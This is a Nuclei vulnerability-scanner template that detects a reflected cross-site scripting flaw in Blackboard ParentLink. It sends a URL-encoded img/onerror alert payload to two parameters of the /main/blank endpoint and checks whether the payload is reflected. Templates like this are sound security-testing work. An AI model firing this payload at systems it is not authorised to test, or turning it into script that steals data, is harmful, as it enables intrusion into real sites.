nuclei-templates/vulnerabilities/other/parentlink-xss.yaml

31 lines
741 B
YAML

id: parentlink-xss
info:
name: Blackboard ParentLink Reflected XSS
author: r3naissance
severity: medium
tags: blackboard,parentlink,xss
reference: https://help.blackboard.com/Community_Engagement/Administrator/Release_Notes
requests:
- method: GET
path:
- '{{BaseURL}}/main/blank?message_success=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E'
- '{{BaseURL}}/main/blank?message_error=%3Cimg%20src%3Dc%20onerror%3Dalert(8675309)%3E'
matchers-condition: and
matchers:
- type: word
words:
- '<img src=c onerror=alert(8675309)>'
part: body
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200